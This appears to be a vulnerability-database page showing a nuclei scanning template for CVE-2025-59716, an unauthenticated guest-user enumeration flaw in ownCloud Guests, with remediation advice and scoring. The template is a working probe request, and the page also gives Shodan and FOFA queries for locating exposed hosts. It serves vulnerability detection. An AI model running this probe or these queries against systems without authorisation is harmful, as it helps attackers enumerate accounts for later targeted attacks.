Lucene search
K

ownCloud Guests - User Enumeration

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Unauthenticated enumeration of guest users in ownCloud Guests before version 0.12.5 due to a token validation flaw.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-59716
3 Nov 202520:55
circl
CNNVD
guests 安全漏洞
5 Nov 202500:00
cnnvd
CVE
CVE-2025-59716
5 Nov 202500:00
cve
Cvelist
CVE-2025-59716
5 Nov 202500:00
cvelist
EUVD
EUVD-2025-37881
5 Nov 202500:00
euvd
NVD
CVE-2025-59716
5 Nov 202517:15
nvd
OSV
CVE-2025-59716
5 Nov 202500:00
osv
Positive Technologies
PT-2025-45141
5 Nov 202500:00
ptsecurity
RedhatCVE
CVE-2025-59716
7 Nov 202513:46
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-59716
1 Apr 202600:00
vulncheck_kev
Rows per page
id: CVE-2025-59716

info:
  name: ownCloud Guests - User Enumeration
  author: DhiyaneshDk
  severity: medium
  description: |
    ownCloud Guests before 0.12.5 contains an unauthenticated user enumeration vulnerability caused by insufficient validation of the token in showPasswordForm at /apps/guests/register/{email}/{token}, letting unauthenticated attackers enumerate valid guest users, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can enumerate valid guest users, potentially aiding further targeted attacks.
  remediation: |
    Update to version 0.12.5 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59716
    - https://gist.github.com/thesmartshadow/64ae0449e909174d0479a4f23657147f
    - https://marketplace.owncloud.com/apps/guests
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-59716
    epss-score: 0.00908
    epss-percentile: 0.55616
    cwe-id: CWE-203
  metadata:
    verified: true
    max-request: 1
    vendor: owncloud
    product: guests
    shodan-query: http.title:"ownCloud"
    fofa-query: title="ownCloud"
  tags: cve,cve2025,owncloud,enum,user-enum,guests,vkev

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - method: GET
    path:
      - "{{BaseURL}}/apps/guests/register/{{email}}/invalid-token-12345"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "No such guest user"
          - "ownCloud"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ea036b9f345fbe3d5cf3366d1a9dc15fa66a14cdcd9726deb738d144b8256ff60221009e3f809e691904ce6adb466d16989fa8ee3171f724e2d1e6d136252c6f8a9928:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Mar 2026 05:27Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.00908
SSVC
13